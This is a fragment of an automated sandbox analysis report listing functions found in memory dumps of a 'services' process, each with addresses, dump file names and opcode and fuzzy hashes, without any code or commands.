                                                                                                                                • Instruction ID: 895f969706740ec331d5100e2f979bbfbbb87727ab3d667859f62a2f8ad3945c
                                                                                                                                • Opcode Fuzzy Hash: a7b165f47e929bb7a713615454ab014037f78e4ecf62437d795a44172b0aeec5
                                                                                                                                • Instruction Fuzzy Hash: 69019230E4D39A9FD712ABA488246E97BB0EF03314F0546B6D815CB1E6CE386628C791
                                                                                                                                Function 00007FFD9B7D9EC8 Relevance: .0, Instructions: 44COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c168d21a7cb78c9b21f663612eb042b55f5448be57ff85ce31e86dcdc097ef78
                                                                                                                                • Instruction ID: f2b1d241b6f505f7e7013e1f7223a8954367a53119ad54ca609d5897b73492b5
                                                                                                                                • Opcode Fuzzy Hash: c168d21a7cb78c9b21f663612eb042b55f5448be57ff85ce31e86dcdc097ef78
                                                                                                                                • Instruction Fuzzy Hash: 0301A830914A4D9FDF44EF58D859AE97BE0FF68305F15026AA80DD32A0DB35E594CB81
                                                                                                                                Function 00007FFD9BE67A4A Relevance: .0, Instructions: 43COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 23753c3f00438cd69e564f2dd1569ba16c4602e7f738b34c6a4e1e695b6f4920
                                                                                                                                • Instruction ID: 1829273ba4da43e942823f5be6bce212a427354bf4a00e7253669f622bc7fe91
                                                                                                                                • Opcode Fuzzy Hash: 23753c3f00438cd69e564f2dd1569ba16c4602e7f738b34c6a4e1e695b6f4920
                                                                                                                                • Instruction Fuzzy Hash: A601123190894CCFCF98EF58C865BD8B7B1EBA8315F1401A9D40DE7291DA319AC5CF40
                                                                                                                                Function 00007FFD9BFEC089 Relevance: .0, Instructions: 43COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 531b0581eb42ea66904ed3809f899e1617eb7430e8e41c0b43d7f5d9df436e9d
                                                                                                                                • Instruction ID: 559df773a1268a1bf133218b0ec4f1525c093d94f361acbf2ae1f10d4ead43f5
                                                                                                                                • Opcode Fuzzy Hash: 531b0581eb42ea66904ed3809f899e1617eb7430e8e41c0b43d7f5d9df436e9d
                                                                                                                                • Instruction Fuzzy Hash: 0A01DB71A0895D8FDB98DF48C464EBCB7A1EF64300F0401AED00ED72A5DA356880CB00
                                                                                                                                Function 00007FFD9B7D94B9 Relevance: .0, Instructions: 43COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 09f8b12c4c60efa117e91942d6f8b829233b56f32586ec26350072fd37c00845
                                                                                                                                • Instruction ID: 25d006bf9d9a41e8d42cbc5450464443c6549ab95b8513ecd78fb30143de358d
                                                                                                                                • Opcode Fuzzy Hash: 09f8b12c4c60efa117e91942d6f8b829233b56f32586ec26350072fd37c00845
                                                                                                                                • Instruction Fuzzy Hash: 58012C3090964D8FCF85DF64C859AEA7BF0FF69304F11059AE419D72A1D734AA54CB80
                                                                                                                                Function 00007FFD9B7D6E29 Relevance: .0, Instructions: 42COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 27075d54b2eed881d37b41f1a7e285fc9d13aaa23efee9fa6953b5d69f6af546
                                                                                                                                • Instruction ID: 69cf48f4844cdf9f9eeb8205fa2d572d7b31a6e1987d43558eeab74894d87d74
                                                                                                                                • Opcode Fuzzy Hash: 27075d54b2eed881d37b41f1a7e285fc9d13aaa23efee9fa6953b5d69f6af546
                                                                                                                                • Instruction Fuzzy Hash: A5016D30948A4D8FCF85EF54C898AEA7BB1FF69301F0501EAD409C71A1DB35EA94CB80
                                                                                                                                Function 00007FFD9B7D878A Relevance: .0, Instructions: 40COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f60f5fa282b96ac0b564c4387b5b106c66f39f9922249b454f16b64966556fc9
                                                                                                                                • Instruction ID: 6121cc6cfdf7800cd0b13eeeea26a7165c4f491ef1809142ea2fb47a828a8529
                                                                                                                                • Opcode Fuzzy Hash: f60f5fa282b96ac0b564c4387b5b106c66f39f9922249b454f16b64966556fc9
                                                                                                                                • Instruction Fuzzy Hash: 9F01C930914A4D9FDF84EF58C859AEA7BF1FF68305F1005AAE80DD7260DB31A594CB81
                                                                                                                                Function 00007FFD9BE67AC2 Relevance: .0, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d113efd8f97b5a118629c9a5ba66942a912636f7de48714ac78e7bd388b78121
                                                                                                                                • Instruction ID: bfeefc9927a975c9d4621f32f9f6b8ebd5f461bdfeab144315cccb402d27359f
                                                                                                                                • Opcode Fuzzy Hash: d113efd8f97b5a118629c9a5ba66942a912636f7de48714ac78e7bd388b78121
                                                                                                                                • Instruction Fuzzy Hash: C8F0623194F3C9DFD7228BB088214D53FA9EF43210B1901F6D495C70A2D56E1B4AC761
                                                                                                                                Function 00007FFD9B7DDF45 Relevance: .0, Instructions: 39COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6159b2a483f3f03223bcd402bd0bd3ce727f09fcc09690cb5f353d5e47313801
                                                                                                                                • Instruction ID: fbfcbef33c894ef92873259904430d96803797d96d3dc86a20e3a6aa9202c4b2
                                                                                                                                • Opcode Fuzzy Hash: 6159b2a483f3f03223bcd402bd0bd3ce727f09fcc09690cb5f353d5e47313801
                                                                                                                                • Instruction Fuzzy Hash: 2D018431A0A20E8EEB309B50C860BEC7371FF94344F5143B9C12A971F6DE742A498F40
                                                                                                                                Function 00007FFD9BFE4742 Relevance: .0, Instructions: 38COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 335c9e4bdad01cba65792b61d1b48b00725d49bdc1648dbbe5ae440057a91e9f
                                                                                                                                • Instruction ID: b7ddc065f9623267b1914594430235c86ff313d15c709f582a0d38b94fa73c43
                                                                                                                                • Opcode Fuzzy Hash: 335c9e4bdad01cba65792b61d1b48b00725d49bdc1648dbbe5ae440057a91e9f
                                                                                                                                • Instruction Fuzzy Hash: F9F0683144E2C99FD7228FB08C615E93FA4AF43214B1501FED499D70B2C56D1606C751
                                                                                                                                Function 00007FFD9B7DDBD3 Relevance: .0, Instructions: 38COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 2f48c1b942be45e1b388f21d32ad2e4000991cd0f0e3a9ae4d38f1c606566007
                                                                                                                                • Instruction ID: bc0b75cb185ee6771e2f537770435261fbab041016eff62c713091d4e96844a9
                                                                                                                                • Opcode Fuzzy Hash: 2f48c1b942be45e1b388f21d32ad2e4000991cd0f0e3a9ae4d38f1c606566007
                                                                                                                                • Instruction Fuzzy Hash: FCF04F30A0864DDFCF45DF58D494AEA7BB0FF98305F1005AAE409D3160CB31A694CB81
                                                                                                                                Function 00007FFD9B7DA1A8 Relevance: .0, Instructions: 37COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 61dbb8f5fc502ba41deb71a5937e4c45789d20b191a0c1f6f907be59de42d094
                                                                                                                                • Instruction ID: 7e3aaf2466dd78cd221e22e237ba890d069a8a4533d1afa5a9f021cbab40a784
                                                                                                                                • Opcode Fuzzy Hash: 61dbb8f5fc502ba41deb71a5937e4c45789d20b191a0c1f6f907be59de42d094
                                                                                                                                • Instruction Fuzzy Hash: 29F0C930A14A0ECFDF94EF58C854AAE77F1FB68305F14056AA419D36A0DB71AA54CB80
                                                                                                                                Function 00007FFD9B7D94D0 Relevance: .0, Instructions: 36COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c4eb82aa514ce425112e84dcdb2091746e79800165bdd970e4566c7abdb8bd7f
                                                                                                                                • Instruction ID: 07889d2d95ba576d037870e959dd20b0dbb211b5c78663632c59e54500e494f5
                                                                                                                                • Opcode Fuzzy Hash: c4eb82aa514ce425112e84dcdb2091746e79800165bdd970e4566c7abdb8bd7f
                                                                                                                                • Instruction Fuzzy Hash: F5F09C7091494DCFDF84EF58C858AEE77F1FB68305F10455AA41DD3264DB719A54CB80
                                                                                                                                Function 00007FFD9B7A91B0 Relevance: .0, Instructions: 35COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A7000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7a7000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 988a72e2fedadd8d1296706634ecd68c0f3c3963232fdbce5b6e65388fcd1c63
                                                                                                                                • Instruction ID: f6032f6167dd6dded51afee1eaa08a3fb76c2be0d88a8933070bffa0a200923c
                                                                                                                                • Opcode Fuzzy Hash: 988a72e2fedadd8d1296706634ecd68c0f3c3963232fdbce5b6e65388fcd1c63
                                                                                                                                • Instruction Fuzzy Hash: E3F0BD30914A4DDFDF91EF58C449AEA77F0FF68305F100566E818C3264DA30E5A0CB81
                                                                                                                                Function 00007FFD9B7D6E40 Relevance: .0, Instructions: 35COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 47aedc0da61b093dfe4ae6a87e754e2aeec25086e20fb1e2737a7a4d90ae2c07
                                                                                                                                • Instruction ID: a04488f30498e3eb23a7d9c21c6b32d5998267a8f534cc7aa42c00b0e61b6512
                                                                                                                                • Opcode Fuzzy Hash: 47aedc0da61b093dfe4ae6a87e754e2aeec25086e20fb1e2737a7a4d90ae2c07
                                                                                                                                • Instruction Fuzzy Hash: 36F0BD3091490D9FDF84EF58C458AAA7BF1FF68305F10459AA41DD3160DB71AA94CB81
                                                                                                                                Function 00007FFD9BE687BA Relevance: .0, Instructions: 33COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8a3a6dbabdcab086a746e106d05845043f95b2358c18dab79c87a79c2b7846ed
                                                                                                                                • Instruction ID: dc5db773c897a717dd2460e15deea2b74748c3f7440c2fcffbf63078a3e4bd00
                                                                                                                                • Opcode Fuzzy Hash: 8a3a6dbabdcab086a746e106d05845043f95b2358c18dab79c87a79c2b7846ed
                                                                                                                                • Instruction Fuzzy Hash: 1EF0F621A0E2CA8FDB325BA48CA50A43FE4DF1734430907BAC054CB0E3D5A43A158711
                                                                                                                                Function 00007FFD9B7B0895 Relevance: .0, Instructions: 30COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A7000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7a7000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6c7006eae2182b9830143103c2617560fce13c1ba3c09f89e72859ca8fc2cc78
                                                                                                                                • Instruction ID: 2ba15ab96322295b6f07576365bbb84f8e9c41b78218c9dd01f99b8320f804fc
                                                                                                                                • Opcode Fuzzy Hash: 6c7006eae2182b9830143103c2617560fce13c1ba3c09f89e72859ca8fc2cc78
                                                                                                                                • Instruction Fuzzy Hash: FCF0C430E0961D8BDB65DFA8C8586EE73F1FB18300F10467AC419E22A0DA78AA05CF50
                                                                                                                                Function 00007FFD9B7B0C45 Relevance: .0, Instructions: 24COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A7000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7a7000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 63f8577d4fd4c242eeed8a3e6d375c33994c5d31edf8e410104f0928f6dd5cd8
                                                                                                                                • Instruction ID: f8aa6ec69c8102d64956de02404d871d271d35841d8ff1dfc3c9a616750478e9
                                                                                                                                • Opcode Fuzzy Hash: 63f8577d4fd4c242eeed8a3e6d375c33994c5d31edf8e410104f0928f6dd5cd8
                                                                                                                                • Instruction Fuzzy Hash: 88F06770E1A76DCEEBA09AA5885C7FDB6A0AF18701F1146B6D40D961B1DB386A81CE04
                                                                                                                                Function 00007FFD9BFE1FCF Relevance: .0, Instructions: 22COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 072797b0e1e3325f85a730dff6a5f7edc08e531d2ddbb33e533b746ff264c656
                                                                                                                                • Instruction ID: 6237d0e82c4102e8cae8d81e75833fe0c5920ee66ad731d2dccb002e7d088405
                                                                                                                                • Opcode Fuzzy Hash: 072797b0e1e3325f85a730dff6a5f7edc08e531d2ddbb33e533b746ff264c656
                                                                                                                                • Instruction Fuzzy Hash: 4DE0863175A90E8FDB64DA89D4A0D75B3A0EB5431571046B6D00EC61B5DE26B981CB40
                                                                                                                                Function 00007FFD9BE6471A Relevance: .0, Instructions: 21COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0213e42f71f367d76fa0294c7d53a86e0ff0956751fbb949b17aded71510a9cf
                                                                                                                                • Instruction ID: d41bee59802b755750fe0b36013ec4ca9d93fc90a7bf7b55978a9c84f9780d7f
                                                                                                                                • Opcode Fuzzy Hash: 0213e42f71f367d76fa0294c7d53a86e0ff0956751fbb949b17aded71510a9cf
                                                                                                                                • Instruction Fuzzy Hash: E4E01234E2941ECFDBA8DB88C8215FEB774FF48305F11023AC00EE21A1DA2A36109A50
                                                                                                                                Function 00007FFD9B7D71B9 Relevance: .0, Instructions: 20COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e89f1249978963d0123443cd978508536880c91048a771724a33d8eab3e8495c
                                                                                                                                • Instruction ID: eab3e0c997227b5dbdc8c272691ffc3d21dc58542dbadd0c1ad4035187c819a7
                                                                                                                                • Opcode Fuzzy Hash: e89f1249978963d0123443cd978508536880c91048a771724a33d8eab3e8495c
                                                                                                                                • Instruction Fuzzy Hash: B8E0EC3190E3C89FDB538F7088659983F70AE57200B0B41D3D088CF0B3D62C9949C712
                                                                                                                                Function 00007FFD9BE60B87 Relevance: .0, Instructions: 18COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 44b3bdf055e479d72f3791cae6cae77561cec0faa9cf705cd283905fa826286d
                                                                                                                                • Instruction ID: 3d54d77562e0591d1ba32105802f61a1eff0c00fc27ac20ae009adf9137c4225
                                                                                                                                • Opcode Fuzzy Hash: 44b3bdf055e479d72f3791cae6cae77561cec0faa9cf705cd283905fa826286d
                                                                                                                                • Instruction Fuzzy Hash: DEE0C241F1E38A8FE7760BB408B01383B909F0774570705FAC9868E2E7DE592E048311
                                                                                                                                Function 00007FFD9B7DE45C Relevance: .0, Instructions: 18COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3039371699.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3fb0f6293c4034eeb5675ba9c35f2468228f541b905b0fc962c0b1dc9e76ec44
                                                                                                                                • Instruction ID: cf43652d3b9357e0fb0fa714b0d15e6d069f09f7a9918bd21934daa5332988ab
                                                                                                                                • Opcode Fuzzy Hash: 3fb0f6293c4034eeb5675ba9c35f2468228f541b905b0fc962c0b1dc9e76ec44
                                                                                                                                • Instruction Fuzzy Hash: 1AE09A71D09228CEDB689A54D8907ECB7B1FB50345F5041AED08EA6291CF785AC9DF41
                                                                                                                                Function 00007FFD9BFEB76E Relevance: .0, Instructions: 14COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: da51e891a7002ffbca7e83b76c756fb8dff2915beed896832aa89dfc7be7832c
                                                                                                                                • Instruction ID: baf0e86053739ec3750bbf9981ac08c06193fa25963273f6015823f44d0e6597
                                                                                                                                • Opcode Fuzzy Hash: da51e891a7002ffbca7e83b76c756fb8dff2915beed896832aa89dfc7be7832c
                                                                                                                                • Instruction Fuzzy Hash: DED0A73060E418CFC7A4CF54C4B0C3133A0EB153807120194E007C71B2C910AE00CB60
                                                                                                                                Function 00007FFD9BFE3422 Relevance: .0, Instructions: 12COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 615b78f036f4009cb73dfdcedcaa69c26f2ea2080ef06f8f22edb8650437fa23
                                                                                                                                • Instruction ID: 2d55c974649041bc554b719bbf75c6132f6b06b4bd5578cdf6515596cf7b2f00
                                                                                                                                • Opcode Fuzzy Hash: 615b78f036f4009cb73dfdcedcaa69c26f2ea2080ef06f8f22edb8650437fa23
                                                                                                                                • Instruction Fuzzy Hash: DAD0C9356498198FDAA5DF58C058D3433A0EB5834072601B8D10BC7271CA21AD40CB91
                                                                                                                                Function 00007FFD9BE60118 Relevance: .0, Instructions: 11COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b91353160be37f3a45390756d0c2017c3e14531d184d23cd011e0f17e47ee6db
                                                                                                                                • Instruction ID: 7d4cde69f56843e8ea5eed563cca79af7cd4331e4c518398744223364142b122
                                                                                                                                • Opcode Fuzzy Hash: b91353160be37f3a45390756d0c2017c3e14531d184d23cd011e0f17e47ee6db
                                                                                                                                • Instruction Fuzzy Hash: FFC0122030E424DFD261DB64C454A263FA4EF0534071201A1F009CB1B6C51AAE00CB10
                                                                                                                                Function 00007FFD9BE692BB Relevance: .0, Instructions: 11COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e0e84db1c0953825c6a11af4ca712878906a4be45a9a3713c164707f23aba6fe
                                                                                                                                • Instruction ID: ce0e39f97927326ba20e83f6b1635d2db8bedaaada7a6588eabc1f51c5ec3551
                                                                                                                                • Opcode Fuzzy Hash: e0e84db1c0953825c6a11af4ca712878906a4be45a9a3713c164707f23aba6fe
                                                                                                                                • Instruction Fuzzy Hash: 11D09218B0F50FCDF379469160B833A61AC5F08300E62443AD45F428E1891EB6056601
                                                                                                                                Function 00007FFD9BE6166B Relevance: .0, Instructions: 11COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3066343649.00007FFD9BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE60000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9be60000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6488bc28c53537ab500aba723839fa30f787ccffec23c85d9048e4accd5f766a
                                                                                                                                • Instruction ID: a1b56a181eb73c666bd63ba03be23a27217aca3a2947a2f32d4a8bca8ed050eb
                                                                                                                                • Opcode Fuzzy Hash: 6488bc28c53537ab500aba723839fa30f787ccffec23c85d9048e4accd5f766a
                                                                                                                                • Instruction Fuzzy Hash: 88D09218B0F64BCDF2BA4696403027D159C8F61310E2A243EC06F419F1C92A7A016623
                                                                                                                                Function 00007FFD9BFE5F0B Relevance: .0, Instructions: 11COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
